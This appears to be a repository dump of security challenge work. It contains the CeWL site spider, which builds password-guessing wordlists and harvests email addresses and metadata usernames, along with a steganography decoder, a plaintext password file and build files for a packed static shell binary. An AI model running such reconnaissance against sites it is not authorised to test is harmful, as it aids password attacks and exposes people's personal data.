 659 | 				allowed_pattern = Regexp.new(arg)
 660 | 			when '--ua'
 661 | 				ua = arg
 662 | 			when '--debug'
 663 | 				debug = true
 664 | 			when '--verbose'
 665 | 				verbose = true
 666 | 			when '--write'
 667 | 				outfile = arg
 668 | 			when "--header"
 669 | 				headers << arg
 670 | 			when "--proxy_password"
 671 | 				proxy_password = arg
 672 | 			when "--proxy_username"
 673 | 				proxy_username = arg
 674 | 			when "--proxy_host"
 675 | 				proxy_host = arg
 676 | 			when "--proxy_port"
 677 | 				proxy_port = arg.to_i
 678 | 			when "--auth_pass"
 679 | 				auth_pass = arg
 680 | 			when "--auth_user"
 681 | 				auth_user = arg
 682 | 			when "--auth_type"
 683 | 				if arg =~ /(digest|basic)/i
 684 | 					auth_type = $1.downcase
 685 | 					if auth_type == "digest"
 686 | 						begin
 687 | 							require "net/http/digest_auth"
 688 | 						rescue LoadError => e
 689 | 							# Catch error and provide feedback on installing gem
 690 | 							puts "\nError: To use digest auth you require the net-http-digest_auth gem\n"
 691 | 							puts "\t Use: 'gem install net-http-digest_auth'\n\n"
 692 | 							exit 2
 693 | 						end
 694 | 					end
 695 | 				else
 696 | 					puts "\nInvalid authentication type, please specify either basic or digest\n\n"
 697 | 					exit 1
 698 | 				end
 699 | 		end
 700 | 	end
 701 | rescue => e
 702 | 	# puts e
 703 | 	usage
 704 | end
 705 | 
 706 | if auth_type && (auth_user.nil? || auth_pass.nil?)
 707 | 	puts "\nIf using basic or digest auth you must provide a username and password\n\n"
 708 | 	exit 1
 709 | end
 710 | 
 711 | if auth_type.nil? && (!auth_user.nil? || !auth_pass.nil?)
 712 | 	puts "\nAuthentication details provided but no mention of basic or digest\n\n"
 713 | 	exit 1
 714 | end
 715 | 
 716 | if ARGV.length != 1
 717 | 	puts "\nMissing URL argument (try --help)\n\n"
 718 | 	exit 1
 719 | end
 720 | 
 721 | url = ARGV.shift
 722 | 
 723 | # Must have protocol
 724 | url = "http://#{url}" if url !~ /^http(s)?:\/\//
 725 | 
 726 | # Taking this back out again. Can't remember why it was put in but have found problems
 727 | # with it in and none with it out so getting rid of it.
 728 | #
 729 | # The spider doesn't work properly if there isn't a / on the end
 730 | #if url !~ /\/$/
 731 | #	url = "#{url}/"
 732 | #end
 733 | 
 734 | group_word_hash = {}
 735 | word_hash = {}
 736 | email_arr = []
 737 | url_stack = Tree.new
 738 | url_stack.debug = debug
 739 | url_stack.max_depth = depth
 740 | usernames = Array.new()
 741 | 
 742 | # Do the checks here so we don't do all the processing then find we can't open the file
 743 | if outfile
 744 | 	begin
 745 | 		outfile_file = File.new(outfile, "w")
 746 | 	rescue
 747 | 		puts "\nCouldn't open the output file for writing\n\n"
 748 | 		exit 2
 749 | 	end
 750 | else
 751 | 	outfile_file = $stdout
 752 | end
 753 | 
 754 | if email_outfile && email
 755 | 	begin
 756 | 		email_outfile_file = File.new(email_outfile, "w")
 757 | 	rescue
 758 | 		puts "\nCouldn't open the email output file for writing\n\n"
 759 | 		exit 2
 760 | 	end
 761 | else
 762 | 	email_outfile_file = outfile_file
 763 | end
 764 | 
 765 | if meta_outfile && email
 766 | 	begin
 767 | 		meta_outfile_file = File.new(meta_outfile, "w")
 768 | 	rescue
 769 | 		puts "\nCouldn't open the metadata output file for writing\n\n"
 770 | 		exit 2
 771 | 	end
 772 | else
 773 | 	meta_outfile_file = outfile_file
 774 | end
 775 | 
 776 | catch :ctrl_c do
 777 | 	begin
 778 | 		puts "Starting at #{url}" if verbose
 779 | 
 780 | 		MySpider.proxy(proxy_host, proxy_port, proxy_username, proxy_password) if proxy_host
 781 | 		MySpider.auth_creds(auth_type, auth_user, auth_pass) if auth_type
 782 | 		MySpider.headers(headers)
 783 | 		MySpider.verbose(verbose)
 784 | 		MySpider.debug(debug)
 785 | 
 786 | 		MySpider.start_at(url) do |s|
 787 | 			s.headers['User-Agent'] = ua if ua
 788 | 
 789 | 			s.add_url_check do |a_url|
 790 | 				puts "Checking page #{a_url}" if debug
 791 | 				allow = true
 792 | 
 793 | 				# Extensions to ignore
 794 | 				if a_url =~ /(\.zip$|\.gz$|\.zip$|\.bz2$|\.png$|\.gif$|\.jpg$|^#)/
 795 | 					puts "Ignoring internal link or graphic: #{a_url}" if verbose
 796 | 					allow = false
 797 | 				else
 798 | 					if /^mailto:(.*)/i.match(a_url)
 799 | 						if email
 800 | 							email_arr << $1
 801 | 							puts "Found #{$1} on page #{a_url}" if verbose
 802 | 						end
 803 | 						allow = false
 804 | 					else
 805 | 						a_url_parsed = URI.parse(a_url)
 806 | 						if !offsite
 807 | 							url_parsed = URI.parse(url)
 808 | 							puts "Comparing #{a_url} with #{url}" if debug
 809 | 
 810 | 							# Make sure the host, port and scheme matches (else its offsite)
 811 | 							allow = (a_url_parsed.host == url_parsed.host) && (a_url_parsed.port == url_parsed.port) && (a_url_parsed.scheme == url_parsed.scheme) ? true : false
 812 | 
 813 | 							puts "Offsite link, not following: #{a_url}" if !allow && verbose
 814 | 						else
 815 | 							puts "Allowing offsite links" if @debug
 816 | 						end
 817 | 
 818 | 						puts "Found: #{a_url_parsed.path}" if @debug
 819 | 
 820 | 						if exclude_array.include?(a_url_parsed.request_uri)
 821 | 							puts "Excluding page: #{a_url_parsed.request_uri}" if verbose
 822 | 							allow = false
 823 | 						end
 824 | 
 825 | 						if allowed_pattern && !a_url_parsed.path.match(allowed_pattern)
 826 | 							puts "Excluding path: #{a_url_parsed.path} based on allowed pattern" if verbose
 827 | 							allow = false
 828 | 						end
 829 | 					end
 830 | 				end
 831 | 				allow
 832 | 			end
 833 | 
 834 | 			# This was :success so only the content from a 200 was processed.
 835 | 			# Updating it to :every so that the content of all pages gets processed
 836 | 			# so you can grab things off 404s or text leaked on redirect and error pages.
 837 | 
 838 | 			s.on :every do |a_url, resp, prior_url|
 839 | 				if verbose
 840 | 					if prior_url.nil?
 841 | 						puts "Visiting: #{a_url}, got response code #{resp.code}"
 842 | 					else
 843 | 						puts "Visiting: #{a_url} referred from #{prior_url}, got response code #{resp.code}"
 844 | 					end
 845 | 				end
 846 | 
 847 | 				# May want 0-9 in here as well in the future but for now limit it to a-z so
 848 | 				# you can't sneak any nasty characters in
 849 | 				if /.*\.([a-z]+)(\?.*$|$)/i.match(a_url)
 850 | 					file_extension = $1
 851 | 				else
 852 | 					file_extension = ''
 853 | 				end
 854 | 
 855 | 				# Don't get words from these file types. Most will have been blocked by the url_check function but
 856 | 				# some are let through, such as .css, so that they can be checked for email addresses
 857 | 
 858 | 				# This is a bad way to do this but it is either white or black list extensions and
 859 | 				# the list of either is quite long, may as well black list and let extra through
 860 | 				# that can then be weeded out later than stop things that could be useful
 861 | 
 862 | 				#if file_extension =~ /^((doc|dot|ppt|pot|xls|xlt|pps)[xm]?)|(ppam|xlsb|xlam|pdf|zip|gz|zip|bz2|css|png|gif|jpg|#)$/
 863 | 				if file_extension =~ /^((doc|dot|ppt|pot|xls|xlt|pps)[xm]?)|(ppam|xlsb|xlam|pdf|zip|gz|zip|bz2|png|gif|jpg|#)$/
 864 | 					if meta
 865 | 						begin
 866 | 							if keep && file_extension =~ /^((doc|dot|ppt|pot|xls|xlt|pps)[xm]?)|(ppam|xlsb|xlam|pdf|zip|gz|zip|bz2)$/
 867 | 								if /.*\/(.*)$/.match(a_url)
 868 | 									output_filename = meta_temp_dir + $1
 869 | 									puts "Keeping #{output_filename}" if verbose
 870 | 								else
 871 | 									# Shouldn't ever get here as the regex above should always be able to pull the filename out of the URL,
 872 | 									# ...but just in case
 873 | 
 874 | 									# Maybe look at doing this to make the temp name
 875 | 									# require "tempfile"
 876 | 									# Dir::Tmpname.make_tmpname "a", "b"
 877 | 									#	=> "a20150707-8694-hrrxr4-b"
 878 | 
 879 | 									output_filename = "#{meta_temp_dir}cewl_tmp"
 880 | 									output_filename += ".#{file_extension}" unless file_extension.empty?
 881 | 								end
 882 | 							else
 883 | 								output_filename = "#{meta_temp_dir}cewl_tmp"
 884 | 								output_filename += ".#{file_extension}" unless file_extension.empty?
 885 | 							end
 886 | 
 887 | 							out = File.new(output_filename, "wb")
 888 | 							out.print(resp.body)
 889 | 							out.close
 890 | 
 891 | 							meta_data = process_file(output_filename, verbose)
 892 | 							usernames += meta_data if (meta_data != nil)
 893 | 						rescue => e
 894 | 							puts "\nCouldn't open the meta temp file for writing - #{e.inspect}\n\n"
 895 | 							exit 2
 896 | 						end
 897 | 					end
 898 | 				else
 899 | 					html = resp.body.to_s.force_encoding("UTF-8")
 900 | 					# This breaks on this site http://www.spisa.nu/recept/ as the
 901 | 					# replace replaces some of the important characters. Needs a fix
 902 | 					html.encode!('UTF-16', 'UTF-8', :invalid => :replace, :replace => '')
 903 | 					html.encode!('UTF-8', 'UTF-16')
 904 | 
 905 | 					dom = Nokogiri.HTML(html)
 906 | 					dom.css('script').remove if strip_js
 907 | 					dom.css('style').remove if strip_css
 908 | 					body = dom.to_s
 909 | 
 910 | 					# Get meta data
 911 | 					if /.*<meta.*description.*content\s*=[\s'"]*(.*)/i.match(body)
 912 | 						description = $1
 913 | 						body += description.gsub(/[>"\/']*/, "")
 914 | 					end
 915 | 
 916 | 					if /.*<meta.*keywords.*content\s*=[\s'"]*(.*)/i.match(body)
 917 | 						keywords = $1
 918 | 						body += keywords.gsub(/[>"\/']*/, "")
 919 | 					end
 920 | 
 921 | 					puts body if debug
 922 | 
 923 | 					# This bit will not normally fire as all JavaScript is stripped out
 924 | 					# by the Nokogiri remove a few lines before this.
 925 | 					#
 926 | 					# The code isn't perfect but will do a rough job of working out
 927 | 					# pages from relative location links
 928 | 					while /(location.href\s*=\s*["']([^"']*)['"];)/i.match(body)
 929 | 						full_match = $1
 930 | 						j_url = $2
 931 | 
 932 | 						puts "Javascript redirect found #{j_url}" if verbose
 933 | 
 934 | 						re = Regexp.escape(full_match)
 935 | 						body.gsub!(/#{re}/, "")
 936 | 
 937 | 						if j_url !~ /https?:\/\//i
 938 | 							parsed = URI.parse(a_url)
 939 | 							protocol = parsed.scheme
 940 | 							host = parsed.host
 941 | 
 942 | 							domain = "#{protocol}://#{host}"
 943 | 
 944 | 							j_url = domain + j_url
 945 | 							j_url += $1 if j_url[0] == "/" && parsed.path =~ /(.*)\/.*/
 946 | 
 947 | 							puts "Relative URL found, adding domain to make #{j_url}" if verbose
 948 | 						end
 949 | 
 950 | 						x = {a_url => j_url}
 951 | 						url_stack.push x
 952 | 					end
 953 | 
 954 | 					# Strip comment tags
 955 | 					body.gsub!(/<!--/, "")
 956 | 					body.gsub!(/-->/, "")
 957 | 
 958 | 					# If you want to add more attribute names to include, just add them to this array
 959 | 					attribute_names = [
 960 | 							"alt",
 961 | 							"title",
 962 | 					]
 963 | 
 964 | 					attribute_text = ''
 965 | 
 966 | 					attribute_names.each { |attribute_name|
 967 | 						body.gsub!(/#{attribute_name}="([^"]*)"/) { |attr| attribute_text += "#{$1} " }
 968 | 					}
 969 | 
 970 | 					if verbose and attribute_text
 971 | 						puts "Attribute text found:"
 972 | 						puts attribute_text
 973 | 						puts
 974 | 					end
 975 | 
 976 | 					body += " #{attribute_text}"
 977 | 
 978 | 					# Strip html tags
 979 | 					words = body.gsub(/<\/?[^>]*>/, "")
 980 | 
 981 | 					# Check if this is needed
 982 | 					words.gsub!(/&[a-z]*;/, "")
 983 | 
 984 | 					begin
 985 | 						#if file_extension !~ /^((doc|dot|ppt|pot|xls|xlt|pps)[xm]?)|(ppam|xlsb|xlam|pdf|zip|gz|zip|bz2|css|png|gif|jpg|#)$/
 986 | 						begin
 987 | 							if email
 988 | 								# Split the file down based on the email address regexp
 989 | 								#words.gsub!(/\b([A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4})\b/i)
 990 | 								#p words
 991 | 
 992 | 								# If you want to pull email addresses from the contents of files found, such as word docs then move
 993 | 								# this block outside the if statement
 994 | 								# I've put it in here as some docs contain email addresses that have nothing to do with the target
 995 | 								# so give false positive type results
 996 | 								words.each_line do |word|
 997 | 									while /\b([A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4})\b/i.match(word)
 998 | 										puts "Found #{$1} on page #{a_url}" if verbose
 999 | 										email_arr << $1
1000 | 										word = word.gsub(/#{$1}/, "")
1001 | 									end
1002 | 								end
1003 | 							end
1004 | 						rescue => e
1005 | 							puts "\nThere was a problem generating the email list"
1006 | 							puts "Error: #{e.inspect}"
1007 | 							puts e.backtrace
1008 | 						end
1009 | 
1010 | 						if wordlist
1011 | 							# Lowercase all parsed words
1012 | 							if lowercase then
1013 | 								words.downcase!
1014 | 							end
1015 | 							# Remove any symbols
1016 | 							if words_with_numbers then
1017 | 								words.gsub!(/[^[[:alnum:]]]/i, " ")
1018 | 							else
1019 | 								words.gsub!(/[^[[:alpha:]]]/i, " ")
1020 | 							end
1021 | 
1022 | 							if convert_umlauts then
1023 | 								words.gsub!(/[äöüßÄÖÜ]/, "ä" => "ae", "ö" => "oe", "ü" => "ue", "ß" => "ss", "Ä" => "Ae", "Ö" => "Oe", "Ü" => "Ue")
1024 | 							end
1025 | 
1026 | 							# Add to the array
1027 | 							group_words = []
1028 | 							words.split(" ").each do |word|
1029 | 								if word.length >= min_word_length and (max_word_length == -1 or word.length <= max_word_length)
1030 | 									word_hash[word] = 0 if !word_hash.has_key?(word)
1031 | 									word_hash[word] += 1
1032 | 								end
1033 | 								if (groups > 0)
1034 | 									group_words.push (word)
1035 | 									if (group_words.length() > groups)
1036 | 										group_words.shift()
1037 | 									end
1038 | 									if (group_words.length() == groups)
1039 | 										joined = group_words.join(" ")
1040 | 										group_word_hash[joined] = 0 if !group_word_hash.has_key?(joined)
1041 | 										group_word_hash[joined] += 1
1042 | 									end
1043 | 								end
1044 | 							end
1045 | 						end
1046 | 						#end
1047 | 					rescue => e
1048 | 						puts "\nThere was a problem handling word generation"
1049 | 						puts "Error: #{e.inspect}"
1050 | 						puts e.backtrace
1051 | 					end
1052 | 				end
1053 | 			end
1054 | 			s.store_next_urls_with url_stack
1055 | 		end
1056 | 	rescue Errno::ENOENT
1057 | 		puts "\nInvalid URL specified (#{url})\n\n"
1058 | 		exit 2
1059 | 	rescue => e
1060 | 		puts "\nCouldn't access the site (#{url})\n"
1061 | 		puts "Error: #{e.inspect}"
1062 | 		puts "Error: #{e.backtrace}"
1063 | 		exit 2
1064 | 	end
1065 | end
1066 | 
1067 | puts "End of main loop" if debug
1068 | 
1069 | if wordlist
1070 | 	if verbose
1071 | 		if outfile.nil?
1072 | 			puts "Words found\n"
1073 | 		else
1074 | 			puts "Writing words to file\n"
1075 | 		end
1076 | 	end
1077 | 
1078 | 	sorted_wordlist = word_hash.sort_by do |word, count|
1079 | 		-count
1080 | 	end
1081 | 
1082 | 	sorted_wordlist.each do |word, count|
1083 | 		if show_count
1084 | 			outfile_file.puts "#{word}, #{count.to_s}"
1085 | 		else
1086 | 			outfile_file.puts word
1087 | 		end
1088 | 	end
1089 | end
1090 | 
1091 | if groups > 0
1092 | 	if verbose
1093 | 		if outfile.nil?
1094 | 			puts "Groups of words found\n"
1095 | 		else
1096 | 			puts "Writing groups of words to file\n"
1097 | 		end
1098 | 	end
1099 | 
1100 | 	sorted_wordlist = group_word_hash.sort_by do |word, count|
1101 | 		-count
1102 | 	end
1103 | 
1104 | 	sorted_wordlist.each do |word, count|
1105 | 		if show_count
1106 | 			outfile_file.puts "#{word}, #{count.to_s}"
1107 | 		else
1108 | 			outfile_file.puts word
1109 | 		end
1110 | 	end
1111 | end
1112 | 
1113 | puts "End of wordlist loop" if debug
1114 | 
1115 | if email
1116 | 	if email_arr.length == 0
1117 | 		puts "No email addresses found" if verbose
1118 | 	else
1119 | 		puts "Dumping email addresses to file" if verbose
1120 | 
1121 | 		email_arr.delete_if { |x| x.chomp.empty? }
1122 | 		email_arr.uniq!
1123 | 		email_arr.sort!
1124 | 
1125 | 		outfile_file.puts if (wordlist || verbose) && email_outfile.nil?
1126 | 
1127 | 		if email_outfile.nil?
1128 | 			outfile_file.puts "Email addresses found"
1129 | 			outfile_file.puts "---------------------"
1130 | 			outfile_file.puts email_arr.join("\n")
1131 | 		else
1132 | 			email_outfile_file.puts email_arr.join("\n")
1133 | 		end
1134 | 	end
1135 | end
1136 | 
1137 | puts "End of email loop" if debug
1138 | 
1139 | if meta
1140 | 	if usernames.length == 0
1141 | 		puts "No meta data found" if verbose
1142 | 	else
1143 | 		puts "Dumping meta data to file" if verbose
1144 | 		usernames.delete_if { |x| x.chomp.empty? }
1145 | 		usernames.uniq!
1146 | 		usernames.sort!
1147 | 
1148 | 		outfile_file.puts if (email||wordlist) && meta_outfile.nil?
1149 | 		if meta_outfile.nil?
1150 | 			outfile_file.puts "Meta data found"
1151 | 			outfile_file.puts "---------------"
1152 | 			outfile_file.puts usernames.join("\n")
1153 | 		else
1154 | 			meta_outfile_file.puts usernames.join("\n")
1155 | 		end
1156 | 	end
1157 | end
1158 | 
1159 | puts "End of meta loop" if debug
1160 | 
1161 | meta_outfile_file.close if meta_outfile
1162 | email_outfile_file.close if email_outfile
1163 | outfile_file.close if outfile
1164 | 


--------------------------------------------------------------------------------
/steganography/sadcarnoises/cewl.patch:
--------------------------------------------------------------------------------
 1 | --- cewl	2023-10-10 14:19:46.257428160 -0700
 2 | +++ cewl-rate-limited	2023-10-10 14:18:41.961090846 -0700
 3 | @@ -187,6 +187,8 @@
 4 |  						#exit if interrupted
 5 |  					end
 6 |  
 7 | +					sleep 0.2
 8 | +
 9 |  					@teardown.call(a_url) unless @teardown.nil?
10 |  					throw :ctrl_c if @interrupt
11 |  				end
12 | 


--------------------------------------------------------------------------------
/steganography/sadcarnoises/decode.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | 
 3 | import wave
 4 | 
 5 | SIZE = 4096
 6 | 
 7 | def decode(data):
 8 |     s = ''.join(str(int(b & 1)) for b in data)
 9 |     return int(s, 2).to_bytes((len(s) + 7) // 8, byteorder='big')
10 | 
11 | with wave.open('sadcarnoises.wav', 'rb') as f:
12 |     with open('sad.luks', 'wb') as g:
13 |         while True:
14 |             try:
15 |                 data = f.readframes(SIZE)
16 |                 g.write(decode(data))
17 |             except ValueError:
18 |                 break
19 | 


--------------------------------------------------------------------------------
/steganography/sadcarnoises/password:
--------------------------------------------------------------------------------
1 | CyberSecuritySolutions
2 | 


--------------------------------------------------------------------------------
/steganography/sadcarnoises/sad.ext4:
--------------------------------------------------------------------------------
1 | version https://git-lfs.github.com/spec/v1
2 | oid sha256:8b7152aedb6ba1cd4595c3677606c85633f7c8ec00207b31b18b900ea9bc7316
3 | size 3421184
4 | 


--------------------------------------------------------------------------------
/steganography/sadcarnoises/sad.luks:
--------------------------------------------------------------------------------
1 | version https://git-lfs.github.com/spec/v1
2 | oid sha256:a090a63f860a051390d947fab7ec5ffc59e7bfdc94df75decd9d956245d69345
3 | size 21591780
4 | 


--------------------------------------------------------------------------------
/steganography/sadcarnoises/sadcarnoises.wav:
--------------------------------------------------------------------------------
1 | version https://git-lfs.github.com/spec/v1
2 | oid sha256:173047c180da4ce16da344e76021fccaf13a2c57d25bcfac4f705dc5653879da
3 | size 172734284
4 | 


--------------------------------------------------------------------------------
/steganography/sadcarnoises/spectrograph.png:
--------------------------------------------------------------------------------
1 | version https://git-lfs.github.com/spec/v1
2 | oid sha256:e248935f0e612c40d8c654feb62f9d8eb4995862119bbe5c07c79dc6ca1a38cf
3 | size 3013752
4 | 


--------------------------------------------------------------------------------
/user-space-diagnostics/Makefile:
--------------------------------------------------------------------------------
1 | shell: shell.c
2 | 	gcc -Os -static -o $@ $<
3 | 
4 | small: shell
5 | 	upx -9 -o $@ $<
6 | 


--------------------------------------------------------------------------------
/user-space-diagnostics/Pipfile:
--------------------------------------------------------------------------------
 1 | [[source]]
 2 | url = "https://pypi.org/simple"
 3 | verify_ssl = true
 4 | name = "pypi"
 5 | 
 6 | [packages]
 7 | can-isotp = "*"
 8 | requests = "*"
 9 | mersenne-twister-predictor = "*"
10 | 
11 | [dev-packages]
12 | 
13 | [requires]
14 | python_version = "3.11"
15 | python_full_version = "3.11.5"
16 | 


--------------------------------------------------------------------------------
/user-space-diagnostics/Pipfile.lock:
--------------------------------------------------------------------------------
  1 | {
  2 |     "_meta": {
  3 |         "hash": {
  4 |             "sha256": "40ff96a678d1a5c56ea0880ee860fbc2001d4d88cfae214019dc2f1e7940cec4"
  5 |         },
  6 |         "pipfile-spec": 6,
  7 |         "requires": {
  8 |             "python_full_version": "3.11.5",
  9 |             "python_version": "3.11"
 10 |         },
 11 |         "sources": [
 12 |             {
 13 |                 "name": "pypi",
 14 |                 "url": "https://pypi.org/simple",
 15 |                 "verify_ssl": true
 16 |             }
 17 |         ]
 18 |     },
 19 |     "default": {
 20 |         "can-isotp": {
 21 |             "hashes": [
 22 |                 "sha256:b69258bf528b2bcfe8de1bfa63f12ae4a19abb329f9520eec67e992f7a6107de",
 23 |                 "sha256:cbfa9b644054a9d68710f6e00e26d0c22342b55d9bdcaad654effb3046f96ee0"
 24 |             ],
 25 |             "index": "pypi",
 26 |             "markers": "python_version >= '3.7'",
 27 |             "version": "==1.9"
 28 |         },
 29 |         "certifi": {
 30 |             "hashes": [
 31 |                 "sha256:539cc1d13202e33ca466e88b2807e29f4c13049d6d87031a3c110744495cb082",
 32 |                 "sha256:92d6037539857d8206b8f6ae472e8b77db8058fec5937a1ef3f54304089edbb9"
 33 |             ],
 34 |             "markers": "python_version >= '3.6'",
 35 |             "version": "==2023.7.22"
 36 |         },
 37 |         "charset-normalizer": {
 38 |             "hashes": [
 39 |                 "sha256:02673e456dc5ab13659f85196c534dc596d4ef260e4d86e856c3b2773ce09843",
 40 |                 "sha256:02af06682e3590ab952599fbadac535ede5d60d78848e555aa58d0c0abbde786",
 41 |                 "sha256:03680bb39035fbcffe828eae9c3f8afc0428c91d38e7d61aa992ef7a59fb120e",
 42 |                 "sha256:0570d21da019941634a531444364f2482e8db0b3425fcd5ac0c36565a64142c8",
 43 |                 "sha256:09c77f964f351a7369cc343911e0df63e762e42bac24cd7d18525961c81754f4",
 44 |                 "sha256:0d3d5b7db9ed8a2b11a774db2bbea7ba1884430a205dbd54a32d61d7c2a190fa",
 45 |                 "sha256:1063da2c85b95f2d1a430f1c33b55c9c17ffaf5e612e10aeaad641c55a9e2b9d",
 46 |                 "sha256:12ebea541c44fdc88ccb794a13fe861cc5e35d64ed689513a5c03d05b53b7c82",
 47 |                 "sha256:153e7b6e724761741e0974fc4dcd406d35ba70b92bfe3fedcb497226c93b9da7",
 48 |                 "sha256:15b26ddf78d57f1d143bdf32e820fd8935d36abe8a25eb9ec0b5a71c82eb3895",
 49 |                 "sha256:1872d01ac8c618a8da634e232f24793883d6e456a66593135aeafe3784b0848d",
 50 |                 "sha256:187d18082694a29005ba2944c882344b6748d5be69e3a89bf3cc9d878e548d5a",
 51 |                 "sha256:1b2919306936ac6efb3aed1fbf81039f7087ddadb3160882a57ee2ff74fd2382",
 52 |                 "sha256:232ac332403e37e4a03d209a3f92ed9071f7d3dbda70e2a5e9cff1c4ba9f0678",
 53 |                 "sha256:23e8565ab7ff33218530bc817922fae827420f143479b753104ab801145b1d5b",
 54 |                 "sha256:24817cb02cbef7cd499f7c9a2735286b4782bd47a5b3516a0e84c50eab44b98e",
 55 |                 "sha256:249c6470a2b60935bafd1d1d13cd613f8cd8388d53461c67397ee6a0f5dce741",
 56 |                 "sha256:24a91a981f185721542a0b7c92e9054b7ab4fea0508a795846bc5b0abf8118d4",
 57 |                 "sha256:2502dd2a736c879c0f0d3e2161e74d9907231e25d35794584b1ca5284e43f596",
 58 |                 "sha256:250c9eb0f4600361dd80d46112213dff2286231d92d3e52af1e5a6083d10cad9",
 59 |                 "sha256:278c296c6f96fa686d74eb449ea1697f3c03dc28b75f873b65b5201806346a69",
 60 |                 "sha256:2935ffc78db9645cb2086c2f8f4cfd23d9b73cc0dc80334bc30aac6f03f68f8c",
 61 |                 "sha256:2f4a0033ce9a76e391542c182f0d48d084855b5fcba5010f707c8e8c34663d77",
 62 |                 "sha256:30a85aed0b864ac88309b7d94be09f6046c834ef60762a8833b660139cfbad13",
 63 |                 "sha256:380c4bde80bce25c6e4f77b19386f5ec9db230df9f2f2ac1e5ad7af2caa70459",
 64 |                 "sha256:3ae38d325b512f63f8da31f826e6cb6c367336f95e418137286ba362925c877e",
 65 |                 "sha256:3b447982ad46348c02cb90d230b75ac34e9886273df3a93eec0539308a6296d7",
 66 |                 "sha256:3debd1150027933210c2fc321527c2299118aa929c2f5a0a80ab6953e3bd1908",
 67 |                 "sha256:4162918ef3098851fcd8a628bf9b6a98d10c380725df9e04caf5ca6dd48c847a",
 68 |                 "sha256:468d2a840567b13a590e67dd276c570f8de00ed767ecc611994c301d0f8c014f",
 69 |                 "sha256:4cc152c5dd831641e995764f9f0b6589519f6f5123258ccaca8c6d34572fefa8",
 70 |                 "sha256:542da1178c1c6af8873e143910e2269add130a299c9106eef2594e15dae5e482",
 71 |                 "sha256:557b21a44ceac6c6b9773bc65aa1b4cc3e248a5ad2f5b914b91579a32e22204d",
 72 |                 "sha256:5707a746c6083a3a74b46b3a631d78d129edab06195a92a8ece755aac25a3f3d",
 73 |                 "sha256:588245972aca710b5b68802c8cad9edaa98589b1b42ad2b53accd6910dad3545",
 74 |                 "sha256:5adf257bd58c1b8632046bbe43ee38c04e1038e9d37de9c57a94d6bd6ce5da34",
 75 |                 "sha256:619d1c96099be5823db34fe89e2582b336b5b074a7f47f819d6b3a57ff7bdb86",
 76 |                 "sha256:63563193aec44bce707e0c5ca64ff69fa72ed7cf34ce6e11d5127555756fd2f6",
 77 |                 "sha256:67b8cc9574bb518ec76dc8e705d4c39ae78bb96237cb533edac149352c1f39fe",
 78 |                 "sha256:6a685067d05e46641d5d1623d7c7fdf15a357546cbb2f71b0ebde91b175ffc3e",
 79 |                 "sha256:70f1d09c0d7748b73290b29219e854b3207aea922f839437870d8cc2168e31cc",
 80 |                 "sha256:750b446b2ffce1739e8578576092179160f6d26bd5e23eb1789c4d64d5af7dc7",
 81 |                 "sha256:7966951325782121e67c81299a031f4c115615e68046f79b85856b86ebffc4cd",
 82 |                 "sha256:7b8b8bf1189b3ba9b8de5c8db4d541b406611a71a955bbbd7385bbc45fcb786c",
 83 |                 "sha256:7f5d10bae5d78e4551b7be7a9b29643a95aded9d0f602aa2ba584f0388e7a557",
 84 |                 "sha256:805dfea4ca10411a5296bcc75638017215a93ffb584c9e344731eef0dcfb026a",
 85 |                 "sha256:81bf654678e575403736b85ba3a7867e31c2c30a69bc57fe88e3ace52fb17b89",
 86 |                 "sha256:82eb849f085624f6a607538ee7b83a6d8126df6d2f7d3b319cb837b289123078",
 87 |                 "sha256:85a32721ddde63c9df9ebb0d2045b9691d9750cb139c161c80e500d210f5e26e",
 88 |                 "sha256:86d1f65ac145e2c9ed71d8ffb1905e9bba3a91ae29ba55b4c46ae6fc31d7c0d4",
 89 |                 "sha256:86f63face3a527284f7bb8a9d4f78988e3c06823f7bea2bd6f0e0e9298ca0403",
 90 |                 "sha256:8eaf82f0eccd1505cf39a45a6bd0a8cf1c70dcfc30dba338207a969d91b965c0",
 91 |                 "sha256:93aa7eef6ee71c629b51ef873991d6911b906d7312c6e8e99790c0f33c576f89",
 92 |                 "sha256:96c2b49eb6a72c0e4991d62406e365d87067ca14c1a729a870d22354e6f68115",
 93 |                 "sha256:9cf3126b85822c4e53aa28c7ec9869b924d6fcfb76e77a45c44b83d91afd74f9",
 94 |                 "sha256:9fe359b2e3a7729010060fbca442ca225280c16e923b37db0e955ac2a2b72a05",
 95 |                 "sha256:a0ac5e7015a5920cfce654c06618ec40c33e12801711da6b4258af59a8eff00a",
 96 |                 "sha256:a3f93dab657839dfa61025056606600a11d0b696d79386f974e459a3fbc568ec",
 97 |                 "sha256:a4b71f4d1765639372a3b32d2638197f5cd5221b19531f9245fcc9ee62d38f56",
 98 |                 "sha256:aae32c93e0f64469f74ccc730a7cb21c7610af3a775157e50bbd38f816536b38",
 99 |                 "sha256:aaf7b34c5bc56b38c931a54f7952f1ff0ae77a2e82496583b247f7c969eb1479",
100 |                 "sha256:abecce40dfebbfa6abf8e324e1860092eeca6f7375c8c4e655a8afb61af58f2c",
101 |                 "sha256:abf0d9f45ea5fb95051c8bfe43cb40cda383772f7e5023a83cc481ca2604d74e",
102 |                 "sha256:ac71b2977fb90c35d41c9453116e283fac47bb9096ad917b8819ca8b943abecd",
103 |                 "sha256:ada214c6fa40f8d800e575de6b91a40d0548139e5dc457d2ebb61470abf50186",
104 |                 "sha256:b09719a17a2301178fac4470d54b1680b18a5048b481cb8890e1ef820cb80455",
105 |                 "sha256:b1121de0e9d6e6ca08289583d7491e7fcb18a439305b34a30b20d8215922d43c",
106 |                 "sha256:b3b2316b25644b23b54a6f6401074cebcecd1244c0b8e80111c9a3f1c8e83d65",
107 |                 "sha256:b3d9b48ee6e3967b7901c052b670c7dda6deb812c309439adaffdec55c6d7b78",
108 |                 "sha256:b5bcf60a228acae568e9911f410f9d9e0d43197d030ae5799e20dca8df588287",
109 |                 "sha256:b8f3307af845803fb0b060ab76cf6dd3a13adc15b6b451f54281d25911eb92df",
110 |                 "sha256:c2af80fb58f0f24b3f3adcb9148e6203fa67dd3f61c4af146ecad033024dde43",
111 |                 "sha256:c350354efb159b8767a6244c166f66e67506e06c8924ed74669b2c70bc8735b1",
112 |                 "sha256:c5a74c359b2d47d26cdbbc7845e9662d6b08a1e915eb015d044729e92e7050b7",
113 |                 "sha256:c71f16da1ed8949774ef79f4a0260d28b83b3a50c6576f8f4f0288d109777989",
114 |                 "sha256:d47ecf253780c90ee181d4d871cd655a789da937454045b17b5798da9393901a",
